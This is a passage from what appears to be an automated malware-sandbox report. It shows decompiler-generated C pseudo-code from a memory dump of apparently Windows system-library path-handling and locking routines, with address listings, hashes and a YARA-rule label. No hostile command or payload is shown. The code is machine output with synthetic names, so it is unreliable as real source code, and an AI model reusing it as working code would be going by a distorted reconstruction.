														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0132F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0132F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E012E52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E012FEB70(1, 0x13d79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E012FAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E013295D0();
																			L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0132B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01323D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0132B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                            0x01304128
                            0x01304135
                            0x0130413c
                            0x01304141
                            0x01304145
                            0x01304147
                            0x0130414e
                            0x01304151
                            0x01304159
                            0x0130415c
                            0x01304160
                            0x01304164
                            0x01304168
                            0x0130416c
                            0x0130417f
                            0x01304181
                            0x0130446a
                            0x0130446a
                            0x0130418c
                            0x01304195
                            0x01304199
                            0x01304432
                            0x01304439
                            0x0130443d
                            0x01304442
                            0x01304447
                            0x00000000
                            0x0130419f
                            0x013041a3
                            0x013041b1
                            0x013041b9
                            0x013041bd
                            0x013045db
                            0x013045db
                            0x00000000
                            0x013041c3
                            0x013041c3
                            0x013041ce
                            0x013041d4
                            0x0134e138
                            0x0134e13e
                            0x0134e169
                            0x0134e16d
                            0x0134e19e
                            0x0134e16f
                            0x0134e16f
                            0x0134e175
                            0x0134e179
                            0x0134e18f
                            0x0134e193
                            0x00000000
                            0x0134e199
                            0x00000000
                            0x0134e199
                            0x0134e193
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013041da
                            0x013041da
                            0x013041df
                            0x013041e4
                            0x013041ec
                            0x01304203
                            0x01304207
                            0x0134e1fd
                            0x01304222
                            0x01304226
                            0x0134e1f3
                            0x0134e1f3
                            0x0130422c
                            0x0130422c
                            0x01304233
                            0x0134e1ed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01304239
                            0x01304239
                            0x01304239
                            0x01304239
                            0x01304233
                            0x01304226
                            0x013041ee
                            0x013041ee
                            0x013041f4
                            0x01304575
                            0x0134e1b1
                            0x0134e1b1
                            0x00000000
                            0x0130457b
                            0x0130457b
                            0x01304582
                            0x0134e1ab
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01304588
                            0x01304588
                            0x0130458c
                            0x0134e1c4
                            0x0134e1c4
                            0x00000000
                            0x01304592
                            0x01304592
                            0x01304599
                            0x0134e1be
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0130459f
                            0x0130459f
                            0x013045a3
                            0x0134e1d7
                            0x0134e1e4
                            0x00000000
                            0x013045a9
                            0x013045a9
                            0x013045b0
                            0x0134e1d1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013045b6
                            0x013045b6
                            0x013045b6
                            0x00000000
                            0x013045b6
                            0x013045b0
                            0x013045a3
                            0x01304599
                            0x0130458c
                            0x01304582
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013041f4
                            0x0130423e
                            0x01304241
                            0x013045c0
                            0x013045c4
                            0x00000000
                            0x013045ca
                            0x013045ca
                            0x00000000
                            0x0134e207
                            0x0134e20f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013045d1
                            0x00000000
                            0x00000000
                            0x013045ca
                            0x00000000
                            0x01304247
                            0x01304247
                            0x01304247
                            0x01304249
                            0x01304249
                            0x01304249
                            0x01304251
                            0x01304251
                            0x01304257
                            0x0130425f
                            0x0130426e
                            0x01304270
                            0x0130427a
                            0x0134e219
                            0x0134e219
                            0x01304280
                            0x01304282
                            0x01304456
                            0x013045ea
                            0x00000000
                            0x013045f0
                            0x0134e223
                            0x00000000
                            0x0134e223
                            0x0130445c
                            0x0130445c
                            0x00000000
                            0x0130445c
                            0x00000000
                            0x01304288
                            0x0130428c
                            0x0134e298
                            0x01304292
                            0x01304292
                            0x0130429e
                            0x013042a3
                            0x013042a7
                            0x013042ac
                            0x0134e22d
                            0x013042b2
                            0x013042b2
                            0x013042b9
                            0x013042bc
                            0x013042c2
                            0x013042ca
                            0x013042cd
                            0x013042cd
                            0x013042d4
                            0x0130433f
                            0x0130433f
                            0x013042d6
                            0x013042d6
                            0x013042d9
                            0x013042dd
                            0x013042eb
                            0x0134e23a
                            0x013042f1
                            0x01304305
                            0x0130430d
                            0x01304315
                            0x01304318
                            0x0130431f
                            0x01304322
                            0x0130432e
                            0x0130433b
                            0x0130433b
                            0x00000000
                            0x0130432e
                            0x013042eb
                            0x0130434c
                            0x0130434e
                            0x01304352
                            0x01304359
                            0x0130435e
                            0x01304361
                            0x0130436e
                            0x0130438a
                            0x0130438e
                            0x01304396
                            0x0130439e
                            0x013043a1
                            0x013043ad
                            0x013043bb
                            0x013043bb
                            0x013043ad
                            0x0130436e
                            0x013043bf
                            0x013043c5
                            0x01304463
                            0x01304463
                            0x013043ce
                            0x013043d5
                            0x013043d9
                            0x013043df
                            0x01304475
                            0x01304479
                            0x01304491
                            0x01304491
                            0x01304479
                            0x013043e5
                            0x013043eb
                            0x013043f4
                            0x013043f6
                            0x013043f9
                            0x013043fc
                            0x013043ff
                            0x013044e8
                            0x013044ed
                            0x013044f3
                            0x0134e247
                            0x00000000
                            0x013044f9
                            0x01304504
                            0x01304508
                            0x0130450f
                            0x0134e269
                            0x00000000
                            0x01304515
                            0x01304519
                            0x01304531
                            0x01304534
                            0x01304537
                            0x0130453e
                            0x01304541
                            0x0130454a
                            0x0134e255
                            0x0134e255
                            0x0134e25b
                            0x0134e25e
                            0x0134e261
                            0x0134e261
                            0x01304555
                            0x01304559
                            0x0130455d
                            0x0134e26d
                            0x0134e270
                            0x0134e274
                            0x0134e27a
                            0x0134e27d
                            0x0134e28e
                            0x0134e28e
                            0x01304563
                            0x01304563
                            0x01304569
                            0x01304569
                            0x00000000
                            0x0130455d
                            0x0130450f
                            0x00000000
                            0x013044f3
                            0x013043ff
                            0x01304405
                            0x01304405
                            0x01304405
                            0x013042ac
                            0x0130428c
                            0x01304282
                            0x01304407
                            0x0130440d
                            0x0134e2af
                            0x0134e2af
                            0x01304413
                            0x01304413
                            0x00000000
                            0x013041d4
                            0x00000000
                            0x013041c3
                            0x013041bd
                            0x01304415
                            0x01304415
                            0x01304416
                            0x01304417
                            0x01304429
                            0x0130416e
                            0x0130416e
                            0x01304175
                            0x01304498
                            0x0130449f
                            0x0134e12d
                            0x00000000
                            0x0134e133
                            0x00000000
                            0x0134e133
                            0x013044a5
                            0x013044a5
                            0x013044aa
                            0x00000000
                            0x013044bb
                            0x013044ca
                            0x013044d6
                            0x013044d7
                            0x013044d8
                            0x013044e3
                            0x013044e3
                            0x013044aa
                            0x0130417b
                            0x0130417b
                            0x0130417b
                            0x00000000
                            0x0130417b
                            0x01304175
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e52b98e153a3450486c8c5b9c19dd2f52fa43a0695a2e12e2b945cb84b468a90
                            • Instruction ID: 914506dbd60f731848da9a4845d9aec8517d86594a31e0a2d05d417643df89b2
                            • Opcode Fuzzy Hash: e52b98e153a3450486c8c5b9c19dd2f52fa43a0695a2e12e2b945cb84b468a90
                            • Instruction Fuzzy Hash: 6CF18F70608211CFC726DF19C490A7AB7E5FF88718F05492EF686CB691E734EA91CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013120A0, Relevance: .4, Instructions: 420COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E013120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x13d8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01312EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01312EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E012E58EC(_t240);
									_t221 =  *0x13d5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x13d5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01324A2C(0x13d6e40, 0x1324b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01307D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x12c5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0131F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0131F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01367016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01302400(_t267 + 0x20);
															}
															L01302400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01312397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01302280(_t134, 0x13d8608);
									__eflags =  *0x13d6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E012FFFB0(_t198, _t241, 0x13d8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x13d6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x13d8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01316B90(_t210,  &_v64);
										_t262 =  *0x13d8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0131E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E013297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0132006A(0x13d8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x13d8608);
												E0132B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x13d6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x13d6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E012FFFB0(_t198, _t240, 0x13d8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E013200C2(0x13d8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                            0x013120a0
                            0x013120a8
                            0x013120ad
                            0x013120b3
                            0x013120b8
                            0x013120c2
                            0x013120c7
                            0x013120cb
                            0x013120d2
                            0x01312263
                            0x01312266
                            0x01355836
                            0x01355836
                            0x00000000
                            0x0131226c
                            0x0131226c
                            0x01312270
                            0x01312274
                            0x013120e2
                            0x013120e2
                            0x013120e6
                            0x013120ee
                            0x013557dc
                            0x013557de
                            0x013557ec
                            0x013557ec
                            0x013557f1
                            0x013557f3
                            0x013557f8
                            0x00000000
                            0x013557f8
                            0x013557e0
                            0x013557e4
                            0x013557ea
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013557ea
                            0x013120f4
                            0x013120f4
                            0x013120f8
                            0x013120f8
                            0x013120fc
                            0x01312100
                            0x01312106
                            0x01312201
                            0x01312206
                            0x0131220b
                            0x0131220e
                            0x013122a9
                            0x013122ac
                            0x00000000
                            0x00000000
                            0x013122b2
                            0x013122b5
                            0x01355801
                            0x01355806
                            0x00000000
                            0x00000000
                            0x01355810
                            0x01355815
                            0x01355818
                            0x00000000
                            0x00000000
                            0x0135581e
                            0x013122bb
                            0x013122bb
                            0x01312218
                            0x01312218
                            0x0131221c
                            0x01312220
                            0x01312222
                            0x013122c2
                            0x013122c4
                            0x013122dc
                            0x013122dc
                            0x013122e1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013122e7
                            0x013122c8
                            0x013122cd
                            0x013122d3
                            0x013122d6
                            0x01355823
                            0x01355825
                            0x01355827
                            0x00000000
                            0x00000000
                            0x0135582d
                            0x00000000
                            0x0135582d
                            0x00000000
                            0x01312228
                            0x01312228
                            0x00000000
                            0x01312228
                            0x01312222
                            0x01312214
                            0x01312214
                            0x00000000
                            0x01312114
                            0x01312114
                            0x01312114
                            0x0131211a
                            0x0131211c
                            0x01312348
                            0x0131234d
                            0x01355840
                            0x01355845
                            0x01355848
                            0x0135584e
                            0x0135584e
                            0x01355848
                            0x01312353
                            0x01312355
                            0x01312388
                            0x01312388
                            0x01312368
                            0x0131236a
                            0x0131236c
                            0x0131238f
                            0x00000000
                            0x0131236e
                            0x0131236e
                            0x0131218e
                            0x0131218e
                            0x01312191
                            0x01312195
                            0x01355a03
                            0x01355a06
                            0x01355a0c
                            0x01355a0f
                            0x01355a11
                            0x01355a13
                            0x01355a13
                            0x01355a19
                            0x01355a1f
                            0x00000000
                            0x0131219b
                            0x0131219b
                            0x013121a0
                            0x01312282
                            0x01312284
                            0x01312284
                            0x01312284
                            0x01312284
                            0x013121a6
                            0x013121a9
                            0x013121ac
                            0x013121ae
                            0x013121b3
                            0x0131228b
                            0x01312290
                            0x01312379
                            0x01312296
                            0x01312298
                            0x01312298
                            0x01312290
                            0x013121b9
                            0x013121be
                            0x013122a2
                            0x013122a2
                            0x013121c4
                            0x013121c8
                            0x013121cc
                            0x013121d0
                            0x013121d4
                            0x013121de
                            0x013121e3
                            0x01355a29
                            0x01355a2c
                            0x00000000
                            0x00000000
                            0x01355a3b
                            0x00000000
                            0x013121e9
                            0x013121e9
                            0x013121e9
                            0x013121ee
                            0x013121f1
                            0x01355a45
                            0x01355a4b
                            0x01355a52
                            0x01355a58
                            0x01355a5d
                            0x01355a5f
                            0x01355a71
                            0x01355a61
                            0x01355a6a
                            0x01355a6a
                            0x01355a76
                            0x01355a79
                            0x01355a7f
                            0x01355a83
                            0x01355a85
                            0x01355a87
                            0x01355a87
                            0x01355a8c
                            0x01355a91
                            0x01355a97
                            0x01355a9f
                            0x01355aa0
                            0x01355aa1
                            0x01355aa6
                            0x01355aab
                            0x01355ab1
                            0x01355ab3
                            0x01355ab9
                            0x01355aca
                            0x01355ad4
                            0x01355ad4
                            0x01355ade
                            0x01355ade
                            0x01355aab
                            0x01355a79
                            0x01355a52
                            0x013121f7
                            0x013121f9
                            0x013121fe
                            0x013121fe
                            0x013121e3
                            0x01312195
                            0x0131236c
                            0x01312122
                            0x01312122
                            0x01312124
                            0x01312231
                            0x01312236
                            0x01312236
                            0x01312238
                            0x01312238
                            0x01312240
                            0x01312242
                            0x01312244
                            0x013559fc
                            0x0131218c
                            0x0131218c
                            0x00000000
                            0x0131218c
                            0x0131224a
                            0x0131224f
                            0x01312256
                            0x01312304
                            0x01312309
                            0x0131230f
                            0x0131231e
                            0x0131231e
                            0x0131231e
                            0x01312320
                            0x01312325
                            0x0131232a
                            0x0131232c
                            0x0131233e
                            0x0131233e
                            0x00000000
                            0x0131232c
                            0x01312311
                            0x01312317
                            0x0131231a
                            0x0131231c
                            0x01312380
                            0x01312380
                            0x01312380
                            0x01312384
                            0x00000000
                            0x00000000
                            0x01312386
                            0x00000000
                            0x0131231c
                            0x0131225c
                            0x0131225c
                            0x00000000
                            0x0131225c
                            0x0131212a
                            0x01312134
                            0x01312138
                            0x0131213d
                            0x01355858
                            0x01355863
                            0x01355863
                            0x01355867
                            0x0135586a
                            0x00000000
                            0x00000000
                            0x0135586c
                            0x0135586c
                            0x01355871
                            0x01355875
                            0x01355877
                            0x01355997
                            0x0135599c
                            0x013559a1
                            0x013559a7
                            0x013559a7
                            0x00000000
                            0x013559a7
                            0x0135587d
                            0x00000000
                            0x0135588b
                            0x0135588b
                            0x01355890
                            0x01355892
                            0x01355894
                            0x01355899
                            0x0135589b
                            0x013558a0
                            0x013558a0
                            0x013558aa
                            0x013558b2
                            0x013558b6
                            0x013558be
                            0x013558c6
                            0x013558c9
                            0x0135590d
                            0x01355917
                            0x0135591a
                            0x0135591c
                            0x01355920
                            0x01355928
                            0x0135592a
                            0x0135592c
                            0x0135592e
                            0x0135592e
                            0x013558cb
                            0x013558cd
                            0x013558d8
                            0x013558e0
                            0x013558f4
                            0x013558fe
                            0x013558fe
                            0x0135593a
                            0x0135593e
                            0x01355940
                            0x01355942
                            0x00000000
                            0x01355944
                            0x01355944
                            0x01355949
                            0x0135594e
                            0x0135594e
                            0x01355953
                            0x0135595b
                            0x01355976
                            0x01355976
                            0x0135597a
                            0x0135597f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01355981
                            0x01355981
                            0x01355981
